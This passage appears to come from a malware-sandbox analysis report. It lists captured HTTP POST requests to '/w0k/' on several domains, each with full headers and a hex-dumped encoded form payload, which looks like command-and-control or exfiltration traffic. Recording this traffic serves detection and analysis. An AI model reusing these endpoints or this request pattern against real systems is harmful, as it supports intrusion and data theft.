74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 Data Ascii: Ttxh=Ca62EbGgpwvbUDoTdBZuST3R1baLzQ~cJQhC4W67BmzwPh6zg9B8TzbrZDTgenuG5aXkn8UuabaqhpRh5GqJDFRplw5JZDJe2SS5WKT-EGYyI8ZMbj2hxU44qFmkHCt4kl2c5hbW9ez7C Source: global traffic HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 Data Ascii: Ttxh=Ca62EbGgpwvbUDoTdBZuST3R1baLzQ~cJQhC4W67BmzwPh6zg9B8TzbrZDTgenuG5aXkn8UuabaqhpRh5GqJDFRplw5JZDJe2SS5WKT-EGYyI8ZMbj2hxU44qFmkHCt4kl2c5hbW9ez7C Source: global traffic HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 5a 33 52 77 76 28 38 31 76 46 61 4e 39 31 71 36 61 4a 46 7a 54 32 62 57 4e 4b 58 5a 4c 6d 5f 57 72 56 4a 51 35 67 48 6f 30 75 63 71 30 78 79 68 65 53 56 38 30 63 47 34 70 6e 66 44 66 7a 74 48 6f 79 4e 79 42 4e 32 34 69 55 5f 53 36 65 39 68 5f 64 46 44 76 77 63 51 72 42 4b 28 49 68 4a 7a 35 69 78 30 46 77 41 4e 50 63 6a 43 58 6f 54 4b 4b 4d 34 6a 4d 6f 4e 5a 72 66 4a 70 71 6e 37 54 59 54 73 63 73 45 79 57 54 4d 54 32 66 4f 6b 6e 45 73 78 46 41 54 35 5a 57 66 71 45 32 4e 72 57 4c 47 6d 71 58 38 55 59 50 5a 58 41 32 35 31 58 54 4e 33 66 63 4a 35 33 45 69 37 46 55 36 4f 51 32 56 43 48 51 56 34 4b 68 66 4c 6c 47 4e 34 39 46 44 6f 55 4e 67 35 7e 45 77 51 53 7a 70 79 75 5f 43 36 65 41 52 79 5a 41 37 4a 28 4e 4c 45 35 45 59 6a 35 66 30 7a 38 4c 63 4c 35 4a 34 4a 6a 4e 71 32 48 4e 45 67 6a 57 68 4f 7e 61 34 47 49 4a 39 62 76 37 41 76 74 6f 77 34 67 46 75 44 6b 69 7a 47 55 64 54 64 58 4a 78 50 35 47 6b 77 62 77 72 77 72 57 7a 77 43 68 79 58 6d 4c 69 41 6f 73 41 63 74 53 6a 33 56 30 34 71 65 5a 39 48 4a 43 44 59 75 50 4e 69 72 52 4a 4a 32 4f 50 74 39 77 69 63 51 47 65 65 70 66 78 56 58 6c 57 58 67 4c 37 70 30 72 39 4e 74 4d 46 38 75 50 39 59 41 37 39 45 53 79 69 54 6a 53 38 78 59 7a 39 47 4e 36 35 44 52 37 48 67 6e 78 50 69 56 73 66 50 42 4c 62 46 4e 68 7e 45 54 34 54 64 32 69 39 4f 37 31 47 4a 30 58 6b 69 5a 31 57 4d 69 79 38 41 61 78 76 6c 4b 6a 51 68 45 79 68 50 70 4b 45 66 56 58 7e 6f 51 59 45 56 41 65 59 61 33 74 4b 42 62 78 51 39 79 54 36 36 6d 58 46 51 41 6d 38 51 31 4c 30 52 36 54 52 67 53 65 45 4e 37 2d 6d 5a 42 33 48 42 34 41 41 45 69 35 4c 51 4d 44 57 7a 52 78 32 4b 36 6b 4b 41 4f 72 57 6e 6f 34 4a 61 73 77 45 6d 4f 67 51 70 39 41 57 5f 54 72 51 5f 31 70 46 35 6f 31 64 79 78 49 6a 48 35 6b 51 33 36 55 6a 6c 70 70 76 47 77 6d 75 5f 7a 54 4a 37 41 42 66 46 34 59 6f 4d 71 35 32 73 28 47 6e 6f 73 49 72 36 7a 34 44 38 63 50 76 59 6a 62 7a 6c 50 44 66 4b 53 6c 78 56 49 56 4f 5a 32 4d 59 33 41 69 4c 55 4b 74 74 32 53 6d 43 33 50 41 4c 30 61 4a 64 71 35 77 6f 53 6b 33 38 68 28 53 36 43 43 70 47 32 35 69 56 42 6b 36 52 78 56 71 49 31 4e 6e 56 43 6f 35 44 77 64 72 61 33 57 4b 58 5a 34 69 6a 65 6c 57 37 38 33 6a 61 68 52 65 73 75 38 78 3 Source: global traffic HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 5a 33 52 77 76 28 38 31 76 46 61 4e 39 31 71 36 61 4a 46 7a 54 32 62 57 4e 4b 58 5a 4c 6d 5f 57 72 56 4a 51 35 67 48 6f 30 75 63 71 30 78 79 68 65 53 56 38 30 63 47 34 70 6e 66 44 66 7a 74 48 6f 79 4e 79 42 4e 32 34 69 55 5f 53 36 65 39 68 5f 64 46 44 76 77 63 51 72 42 4b 28 49 68 4a 7a 35 69 78 30 46 77 41 4e 50 63 6a 43 58 6f 54 4b 4b 4d 34 6a 4d 6f 4e 5a 72 66 4a 70 71 6e 37 54 59 54 73 63 73 45 79 57 54 4d 54 32 66 4f 6b 6e 45 73 78 46 41 54 35 5a 57 66 71 45 32 4e 72 57 4c 47 6d 71 58 38 55 59 50 5a 58 41 32 35 31 58 54 4e 33 66 63 4a 35 33 45 69 37 46 55 36 4f 51 32 56 43 48 51 56 34 4b 68 66 4c 6c 47 4e 34 39 46 44 6f 55 4e 67 35 7e 45 77 51 53 7a 70 79 75 5f 43 36 65 41 52 79 5a 41 37 4a 28 4e 4c 45 35 45 59 6a 35 66 30 7a 38 4c 63 4c 35 4a 34 4a 6a 4e 71 32 48 4e 45 67 6a 57 68 4f 7e 61 34 47 49 4a 39 62 76 37 41 76 74 6f 77 34 67 46 75 44 6b 69 7a 47 55 64 54 64 58 4a 78 50 35 47 6b 77 62 77 72 77 72 57 7a 77 43 68 79 58 6d 4c 69 41 6f 73 41 63 74 53 6a 33 56 30 34 71 65 5a 39 48 4a 43 44 59 75 50 4e 69 72 52 4a 4a 32 4f 50 74 39 77 69 63 51 47 65 65 70 66 78 56 58 6c 57 58 67 4c 37 70 30 72 39 4e 74 4d 46 38 75 50 39 59 41 37 39 45 53 79 69 54 6a 53 38 78 59 7a 39 47 4e 36 35 44 52 37 48 67 6e 78 50 69 56 73 66 50 42 4c 62 46 4e 68 7e 45 54 34 54 64 32 69 39 4f 37 31 47 4a 30 58 6b 69 5a 31 57 4d 69 79 38 41 61 78 76 6c 4b 6a 51 68 45 79 68 50 70 4b 45 66 56 58 7e 6f 51 59 45 56 41 65 59 61 33 74 4b 42 62 78 51 39 79 54 36 36 6d 58 46 51 41 6d 38 51 31 4c 30 52 36 54 52 67 53 65 45 4e 37 2d 6d 5a 42 33 48 42 34 41 41 45 69 35 4c 51 4d 44 57 7a 52 78 32 4b 36 6b 4b 41 4f 72 57 6e 6f 34 4a 61 73 77 45 6d 4f 67 51 70 39 41 57 5f 54 72 51 5f 31 70 46 35 6f 31 64 79 78 49 6a 48 35 6b 51 33 36 55 6a 6c 70 70 76 47 77 6d 75 5f 7a 54 4a 37 41 42 66 46 34 59 6f 4d 71 35 32 73 28 47 6e 6f 73 49 72 36 7a 34 44 38 63 50 76 59 6a 62 7a 6c 50 44 66 4b 53 6c 78 56 49 56 4f 5a 32 4d 59 33 41 69 4c 55 4b 74 74 32 53 6d 43 33 50 41 4c 30 61 4a 64 71 35 77 6f 53 6b 33 38 68 28 53 36 43 43 70 47 32 35 69 56 42 6b 36 52 78 56 71 49 31 4e 6e 56 43 6f 35 44 77 64 72 61 33 57 4b 58 5a 34 69 6a 65 6c 57 37 38 33 6a 61 68 52 65 73 75 38 78 3 Source: global traffic HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 5a 33 52 77 76 28 38 31 76 46 61 4e 39 31 71 36 61 4a 46 7a 54 32 62 57 4e 4b 58 5a 4c 6d 5f 57 72 56 4a 51 35 67 48 6f 30 75 63 71 30 78 79 68 65 53 56 38 30 63 47 34 70 6e 66 44 66 7a 74 48 6f 79 4e 79 42 4e 32 34 69 55 5f 53 36 65 39 68 5f 64 46 44 76 77 63 51 72 42 4b 28 49 68 4a 7a 35 69 78 30 46 77 41 4e 50 63 6a 43 58 6f 54 4b 4b 4d 34 6a 4d 6f 4e 5a 72 66 4a 70 71 6e 37 54 59 54 73 63 73 45 79 57 54 4d 54 32 66 4f 6b 6e 45 73 78 46 41 54 35 5a 57 66 71 45 32 4e 72 57 4c 47 6d 71 58 38 55 59 50 5a 58 41 32 35 31 58 54 4e 33 66 63 4a 35 33 45 69 37 46 55 36 4f 51 32 56 43 48 51 56 34 4b 68 66 4c 6c 47 4e 34 39 46 44 6f 55 4e 67 35 7e 45 77 51 53 7a 70 79 75 5f 43 36 65 41 52 79 5a 41 37 4a 28 4e 4c 45 35 45 59 6a 35 66 30 7a 38 4c 63 4c 35 4a 34 4a 6a 4e 71 32 48 4e 45 67 6a 57 68 4f 7e 61 34 47 49 4a 39 62 76 37 41 76 74 6f 77 34 67 46 75 44 6b 69 7a 47 55 64 54 64 58 4a 78 50 35 47 6b 77 62 77 72 77 72 57 7a 77 43 68 79 58 6d 4c 69 41 6f 73 41 63 74 53 6a 33 56 30 34 71 65 5a 39 48 4a 43 44 59 75 50 4e 69 72 52 4a 4a 32 4f 50 74 39 77 69 63 51 47 65 65 70 66 78 56 58 6c 57 58 67 4c 37 70 30 72 39 4e 74 4d 46 38 75 50 39 59 41 37 39 45 53 79 69 54 6a 53 38 78 59 7a 39 47 4e 36 35 44 52 37 48 67 6e 78 50 69 56 73 66 50 42 4c 62 46 4e 68 7e 45 54 34 54 64 32 69 39 4f 37 31 47 4a 30 58 6b 69 5a 31 57 4d 69 79 38 41 61 78 76 6c 4b 6a 51 68 45 79 68 50 70 4b 45 66 56 58 7e 6f 51 59 45 56 41 65 59 61 33 74 4b 42 62 78 51 39 79 54 36 36 6d 58 46 51 41 6d 38 51 31 4c 30 52 36 54 52 67 53 65 45 4e 37 2d 6d 5a 42 33 48 42 34 41 41 45 69 35 4c 51 4d 44 57 7a 52 78 32 4b 36 6b 4b 41 4f 72 57 6e 6f 34 4a 61 73 77 45 6d 4f 67 51 70 39 41 57 5f 54 72 51 5f 31 70 46 35 6f 31 64 79 78 49 6a 48 35 6b 51 33 36 55 6a 6c 70 70 76 47 77 6d 75 5f 7a 54 4a 37 41 42 66 46 34 59 6f 4d 71 35 32 73 28 47 6e 6f 73 49 72 36 7a 34 44 38 63 50 76 59 6a 62 7a 6c 50 44 66 4b 53 6c 78 56 49 56 4f 5a 32 4d 59 33 41 69 4c 55 4b 74 74 32 53 6d 43 33 50 41 4c 30 61 4a 64 71 35 77 6f 53 6b 33 38 68 28 53 36 43 43 70 47 32 35 69 56 42 6b 36 52 78 56 71 49 31 4e 6e 56 43 6f 35 44 77 64 72 61 33 57 4b 58 5a 34 69 6a 65 6c 57 37 38 33 6a 61 68 52 65 73 75 38 78 3 Source: global traffic HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.sebasview.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.sebasview.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sebasview.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 4f 51 39 4b 63 2d 41 4e 75 57 42 52 6d 41 4f 33 51 37 38 48 45 69 28 4a 4f 5f 72 69 61 30 64 44 59 63 70 4f 48 63 37 5a 56 74 67 72 68 53 70 49 51 43 64 45 47 65 55 78 38 5a 73 68 47 35 4b 44 68 6e 41 4b 39 77 33 55 37 57 75 6f 45 59 55 32 4e 49 51 48 34 37 4e 6c 4b 6f 6a 30 51 33 57 4c 39 77 47 55 59 72 58 78 71 62 32 69 47 44 41 34 49 7a 72 56 56 45 75 68 69 66 33 2d 56 36 58 49 53 57 30 50 6f 5f 50 37 73 48 6c 6c 7a 36 77 6c 4a 4a 4c 5f 41 34 6e 35 67 57 41 49 4e 58 6b 30 6a 74 39 68 51 39 4a 76 32 74 61 61 4e 59 43 33 68 30 66 54 50 68 59 41 65 63 6f 33 59 70 55 76 72 58 41 36 7a 71 50 44 45 5a 38 73 36 34 49 7a 46 49 30 69 38 37 7e 68 4e 59 66 45 69 41 66 79 74 5a 4d 76 34 58 32 51 71 6a 35 4f 4f 30 46 68 70 32 51 47 77 59 62 69 6f 61 5a 55 32 7a 79 47 35 70 4c 63 6f 61 76 71 6b 6a 77 53 7a 42 46 51 41 75 7e 61 49 6f 51 30 7a 30 4e 63 42 6c 35 62 6e 6b 6b 55 76 57 5a 36 78 62 43 53 4e 54 78 36 79 4e 30 53 6a 41 4d 36 6c 51 78 6f 71 58 69 6c 6e 41 30 34 70 47 4d 57 57 58 77 65 77 42 36 56 67 61 45 6b 33 4f 35 50 57 4d 58 2d 28 4a 74 30 30 4a 4c 50 73 5f 35 6f 30 2d 34 6e 51 53 47 47 66 34 6c 58 58 47 37 70 31 78 6e 45 48 36 58 48 32 5f 45 5a 75 4e 6f 54 6f 65 53 72 35 35 51 5f 33 72 6c 37 47 7a 4b 38 65 56 44 36 62 4f 5a 6b 70 43 54 70 7e 4a 66 52 71 5f 45 34 78 39 44 51 45 54 67 37 67 55 57 4f 34 32 32 55 33 6e 41 59 36 41 73 6d 42 39 59 6d 75 4a 45 52 51 76 53 48 69 38 51 45 36 31 6c 4e 4c 30 7e 78 47 53 46 39 70 34 34 49 35 30 37 2d 32 4d 49 70 46 56 31 62 4f 47 74 36 36 5f 63 44 72 51 37 45 6b 76 31 59 62 5a 77 72 61 54 6b 6d 59 4d 70 51 63 44 77 76 72 6b 69 67 74 6c 51 36 48 61 31 46 7a 52 73 6d 42 72 35 69 44 37 47 39 76 31 43 59 56 31 6a 51 69 50 6a 43 49 66 73 71 41 4d 31 4c 7e 4f 73 55 37 39 52 49 4f 6f 4b 49 64 77 70 38 33 31 77 57 53 31 70 6d 6b 49 28 63 69 67 4c 36 48 51 33 65 4f 42 66 6d 64 38 42 75 4f 56 41 46 51 78 36 48 4b 6b 47 33 72 49 48 38 68 57 46 70 61 50 73 59 75 39 34 50 46 46 65 70 43 57 39 35 75 6a 28 70 76 77 59 32 31 5a 63 68 34 2d 71 56 4d 55 37 69 6d 30 64 6e 4f 55 51 75 76 34 74 51 4b 74 38 67 35 79 56 76 72 70 69 66 74 34 67 5f 4a 56 4d 44 6d 34 51 32 45 6b 4c 6f 74 31 30 44 57 36 66 72 51 72 69 52 4b 70 33 75 75 64 39 76 36 56 33 73 6d 67 62 45 6c 51 6c 50 44 42 4e 49 7a 54 6b 67 4e 66 6b 41 4e 6e 50 4e 54 43 72 65 41 61 5a 74 54 61 5a 48 39 32 4a 58 5a 4f 70 2d 57 73 4b 66 44 64 34 37 36 34 7e 66 37 6b 4d 6d 78 4e 35 48 62 75 34 4d 51 79 46 74 35 42 6d 49 6b 68 35 58 62 30 4b 45 6c 78 58 39 79 55 7a 6a 73 46 57 6c 66 6e 36 4e 45 33 58 70 78 2d 49 78 43 45 58 61 4f 58 68 65 7a 55 71 55 79 4e 36 50 6 Source: global traffic HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.michalshahar.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.michalshahar.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.michalshahar.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 6e 73 78 76 34 53 67 33 52 4a 4d 30 6a 4c 4a 4e 41 53 28 6c 76 65 39 4d 41 51 39 6e 6b 38 54 67 45 2d 36 6f 46 4d 55 70 4d 39 4b 42 55 43 49 53 75 4f 38 34 4f 5a 6d 57 65 4c 76 41 69 4b 75 72 6a 50 7a 4c 34 57 41 61 36 77 53 62 34 41 68 49 67 74 64 74 6d 5f 65 33 4f 31 72 49 45 61 57 58 44 54 38 45 53 57 36 6a 32 4d 61 4c 76 67 4e 63 55 49 48 63 57 6b 31 55 4e 30 79 78 51 36 59 36 4d 5a 78 4f 53 46 70 4b 6b 47 76 6e 28 6e 68 4f 75 69 71 79 57 61 36 4a 66 4e 63 30 39 56 52 4a 77 54 32 62 42 30 54 70 6d 4d 49 49 34 38 6e 31 58 64 73 4c 5a 41 67 6e 4f 4d 62 78 44 76 44 57 6a 41 61 64 46 51 56 73 45 53 69 75 61 77 51 5a 62 4a 46 6b 68 31 55 77 51 69 31 4c 46 42 49 49 62 68 50 76 4a 6a 39 50 4b 61 69 4a 41 4a 4f 45 6d 6a 37 7a 37 64 4c 50 46 6b 6a 6e 76 4d 4f 63 47 53 77 66 4f 54 44 54 6c 66 6b 69 66 42 4f 67 68 74 75 68 47 42 7e 48 74 78 68 52 5a 57 63 69 62 63 72 50 31 6b 41 71 6f 74 52 48 6d 64 44 34 4d 45 39 42 41 59 4c 33 69 46 61 32 57 43 70 41 58 52 32 33 4d 6d 33 49 73 45 43 32 6f 55 54 73 74 72 41 61 71 44 57 67 28 68 53 71 79 4b 7e 6e 69 5f 6a 78 32 35 44 70 45 47 71 54 77 51 51 54 6d 70 4c 33 42 51 33 6a 52 54 57 61 67 57 58 4a 4d 42 62 68 50 4e 6e 58 51 35 31 4e 6e 75 50 32 55 50 71 6b 47 61 45 50 6b 37 6a 65 32 53 6c 64 36 4f 6f 6d 59 31 4f 48 66 47 59 4b 43 78 65 48 76 6b 58 62 78 75 4a 6b 46 4a 4d 6d 51 56 76 4f 4a 77 6c 6c 70 77 54 78 41 50 59 5a 6d 34 49 4a 54 32 77 6e 41 33 64 69 6a 43 6f 5a 46 78 48 6c 52 55 32 31 37 79 37 73 65 6d 4f 53 76 74 73 7a 51 2d 4a 2d 76 67 45 72 43 39 59 35 74 52 6d 70 78 4e 45 4e 4c 39 6f 42 73 76 72 73 69 7a 54 2d 62 33 7a 38 65 69 44 68 70 61 70 66 41 6b 4f 36 49 68 33 53 56 74 47 59 4e 4f 4d 46 30 31 77 77 75 50 6f 68 34 57 62 31 49 77 48 61 69 53 69 4a 39 51 28 50 43 43 53 37 68 52 6c 38 59 55 28 56 63 4c 55 66 79 55 45 52 6e 4d 70 75 32 4c 72 42 6b 6c 68 35 6c 58 75 41 4c 4d 76 33 63 76 52 67 77 74 58 6c 47 45 70 67 77 56 4f 63 42 34 75 50 62 30 77 76 6a 78 52 6f 72 56 42 78 6f 6f 38 6f 33 66 57 77 73 50 6f 66 50 34 4b 64 30 34 37 76 65 67 6e 6a 30 66 47 30 51 61 7e 35 44 6f 55 5a 69 6f 5a 49 39 57 4f 63 78 78 7e 34 49 33 67 4b 6b 70 62 71 7a 78 47 53 48 32 7e 63 67 38 77 2d 58 33 4f 6f 72 68 68 5a 49 53 41 6c 78 38 39 6d 4d 42 6b 49 56 48 4b 4b 50 7a 4e 4c 49 31 4e 52 58 39 50 75 32 51 52 5f 71 66 36 44 69 6b 5a 73 65 4c 4d 47 55 6f 7a 65 6a 33 30 2d 38 54 73 63 51 64 4c 35 64 57 28 53 66 52 39 7a 30 76 6a 47 78 6b 74 73 67 32 74 55 56 39 72 37 59 51 6f 50 64 79 56 6b 37 56 74 55 30 35 44 65 63 72 49 45 50 75 35 32 46 5f 70 47 6f 41 72 46 41 70 55 77 58 41 79 36 59 63 47 4e 61 4 Source: global traffic HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.nacemo.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.nacemo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nacemo.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 6b 38 71 45 6e 51 61 70 4e 58 48 6f 66 57 35 68 64 4b 52 4b 4b 32 45 2d 67 36 6f 32 4e 64 74 78 78 78 44 6e 50 37 68 5f 56 68 4d 78 33 63 7a 59 61 31 43 48 6c 6b 4b 61 73 73 56 74 37 59 5a 59 72 6f 61 78 38 4c 6a 65 6d 72 7e 74 51 6e 35 39 68 70 4f 45 69 36 38 65 59 33 44 39 4e 79 7a 34 44 65 59 43 52 78 5a 6f 50 72 59 5f 63 42 59 41 78 47 66 65 48 66 33 56 38 53 43 39 59 6b 77 38 38 74 49 65 69 2d 36 73 4b 74 36 61 35 34 79 63 68 68 51 71 50 76 53 2d 53 68 57 47 71 4b 71 54 4f 6c 4a 7a 6d 39 62 53 45 73 31 49 61 45 36 63 69 39 44 6a 54 4b 34 4d 62 78 66 70 4d 74 51 31 32 35 55 45 72 55 78 44 58 74 43 57 66 4e 6c 49 78 61 53 72 73 4f 33 53 49 69 34 49 6a 79 6f 79 39 34 7a 51 45 53 7e 74 32 34 52 51 4c 71 49 44 49 57 70 77 70 77 4b 34 4e 48 61 77 4e 50 5a 4d 36 74 44 6f 6a 2d 37 59 44 6b 55 31 68 36 46 56 30 38 56 32 34 38 75 50 36 64 32 57 57 77 4a 49 50 62 63 55 59 74 50 4d 74 45 72 49 67 4f 6f 32 54 6c 47 57 49 53 42 41 47 4a 49 32 7a 6d 7e 4d 4b 54 30 79 55 64 4f 4a 5a 2d 59 64 38 64 51 56 44 5f 42 6e 42 31 76 7a 33 64 56 64 45 31 28 5f 4d 52 71 68 4d 61 71 65 51 6a 58 6b 70 2d 79 65 4b 6b 65 54 79 63 46 77 71 63 70 36 61 77 39 49 62 6d 31 4f 4c 39 36 59 58 33 53 78 62 59 68 41 31 35 55 39 4c 75 46 43 68 59 50 41 38 39 44 69 72 46 58 70 69 35 78 4a 5a 70 4b 34 6b 38 57 74 4c 4c 4c 36 34 34 7a 51 7a 65 5a 32 4d 39 66 45 67 42 70 6e 53 46 68 4f 51 66 70 6e 76 71 41 41 72 6c 33 41 48 72 30 79 4e 6a 39 42 53 7a 38 4a 37 4d 37 79 6c 73 65 36 64 68 6d 72 68 35 5a 58 59 79 6c 44 6d 6f 5a 73 64 55 4c 2d 66 6d 28 76 55 61 5a 37 64 67 43 67 69 35 4b 67 53 35 72 48 42 56 4d 54 39 55 72 51 78 44 77 4a 6f 54 46 51 31 41 56 42 41 56 6d 6c 37 30 6c 4e 52 2d 42 75 53 46 77 6f 37 41 30 59 35 31 59 6d 53 50 31 49 49 54 4e 4f 53 4a 76 56 33 72 71 36 75 65 6f 30 59 68 72 42 30 38 58 42 6d 71 38 38 37 42 35 31 62 2d 46 44 77 65 79 6a 45 4f 70 65 59 46 61 45 36 6a 4e 74 4c 73 4a 44 4f 52 4d 52 78 4d 74 7a 68 6d 30 71 4a 76 55 74 4e 34 67 58 30 73 34 74 6b 58 6a 51 61 6e 6c 36 50 35 6f 61 4f 59 32 78 6f 50 55 59 78 76 55 71 5a 5f 4d 44 62 6c 4b 66 51 46 69 62 36 6f 4d 55 41 4b 73 65 31 48 41 4c 47 31 4d 5f 61 66 47 66 50 6e 59 78 74 4a 64 6d 33 6b 36 4b 41 6e 4e 75 4e 6f 6b 43 43 38 37 35 55 66 6b 31 52 6a 4b 63 42 74 30 37 62 66 59 38 6c 69 62 4b 79 31 32 37 50 52 7e 65 34 38 37 34 39 30 65 4c 65 43 4c 6e 4f 65 49 58 71 32 6d 6b 77 51 31 6a 44 63 59 65 36 43 37 57 66 64 35 44 67 5a 30 4e 72 33 32 59 50 63 70 6a 4e 49 77 51 71 6b 47 5a 65 53 70 5f 6a 57 43 45 52 59 4d 41 32 70 74 44 70 7a 30 32 6f 61 6e 70 6f 37 46 63 34 6e 49 6d 65 38 30 70 58 30 46 4c 56 41 61 6 Source: global traffic HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.workingtechnologiesmexico.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.workingtechnologiesmexico.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.workingtechnologiesmexico.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 55 44 4d 4f 73 6b 44 45 4e 5a 6e 65 65 65 5a 6d 52 7a 61 73 41 73 75 47 75 73 35 61 76 78 62 6a 33 4a 51 55 7e 64 35 4f 34 57 69 32 61 48 74 35 4d 37 41 55 6a 71 73 4d 49 5a 50 57 71 34 42 59 35 31 74 44 67 4a 55 66 58 69 6b 57 50 45 4c 62 6a 48 42 48 74 57 65 4f 43 70 46 6a 39 73 67 47 68 4c 70 41 57 6c 70 4e 72 4b 31 43 43 6e 48 54 65 4e 31 34 32 2d 4b 61 6c 39 66 56 6c 5f 64 55 76 53 74 4e 6e 38 4d 59 66 4d 54 76 52 50 6d 5f 57 31 34 66 31 7a 51 38 7a 64 58 77 45 53 4d 34 49 41 6b 48 55 68 4d 76 58 73 57 5f 43 47 46 73 42 6e 45 31 28 62 46 52 4f 5a 66 67 4d 51 58 30 67 38 61 74 38 39 34 6d 6e 68 45 44 6f 4b 44 77 74 67 74 39 70 42 49 36 73 7a 4e 67 44 37 34 42 7a 74 4b 45 69 42 50 48 67 32 34 39 59 41 54 4f 61 7a 62 34 31 5f 66 77 52 77 65 4d 36 45 44 77 66 62 63 30 7a 4c 6c 71 52 4f 65 64 67 50 6c 56 43 57 38 70 4d 30 71 33 43 6d 74 68 30 44 70 35 31 